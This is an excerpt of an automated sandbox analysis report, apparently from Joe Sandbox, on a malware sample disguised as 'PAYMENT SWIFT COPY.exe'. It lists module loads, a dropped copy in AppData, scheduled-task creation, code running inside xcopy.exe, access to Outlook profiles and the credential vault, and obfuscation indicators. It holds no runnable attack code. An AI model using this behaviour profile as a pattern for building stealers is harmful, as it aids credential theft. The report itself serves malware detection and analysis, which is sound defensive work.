                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PAYMENT SWIFT COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PAYMENT SWIFT COPY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PAYMENT SWIFT COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: xcopy.pdbUGP source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PAYMENT SWIFT COPY.exe, PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: drfYhRLxnrcfFY.exe, 0000000E.00000000.1789131434.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4139832157.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.PAYMENT SWIFT COPY.exe.57b0000.5.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.cs.Net Code: Mx3ZaMMKsG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.cs.Net Code: Mx3ZaMMKsG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.cs.Net Code: Mx3ZaMMKsG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT SWIFT COPY.exe.3d18bc0.3.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: PAYMENT SWIFT COPY.exeStatic PE information: 0xB570BB47 [Fri Jun 18 05:21:11 2066 UTC]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 0_2_010CF288 pushfd ; iretd 0_2_010CF291
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00411946 push ebp; iretd 8_2_00411947
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00405172 push ss; ret 8_2_00405174
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401900 push ss; ret 8_2_00401902
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004031D0 push eax; ret 8_2_004031D2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00408208 push eax; retf 8_2_0040820B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00418238 push ebx; retf 8_2_0041823E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004143E1 push cs; iretd 8_2_004143EF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004173FA push 36BCB849h; ret 8_2_00417406
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00417407 push 36BCB849h; ret 8_2_00417405
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401D77 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401DE2 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401DE4 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401DF1 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401DF3 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401D8F push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401E00 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401E02 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401E14 push ss; ret 8_2_00401D8E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00401EDA push ebp; ret 8_2_00401EE8
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00413FFA push ebp; ret 8_2_00414005
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018A225F pushad ; ret 8_2_018A27F9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018A27FA pushad ; ret 8_2_018A27F9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D09AD push ecx; mov dword ptr [esp], ecx8_2_018D09B6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018A283D push eax; iretd 8_2_018A2858
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018A1368 push eax; iretd 8_2_018A1369
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 9_2_0103F288 pushfd ; iretd 9_2_0103F291
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0158C06D push edi; ret 13_2_0158C06F
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0158C54D pushfd ; ret 13_2_0158C54E
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0158C54F push 8B015167h; ret 13_2_0158C554
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0158C9D7 push edi; ret 13_2_0158C9D9
                Source: PAYMENT SWIFT COPY.exeStatic PE information: section name: .text entropy: 7.764765019063298
                Source: NCchtKNKiPqC.exe.0.drStatic PE information: section name: .text entropy: 7.764765019063298
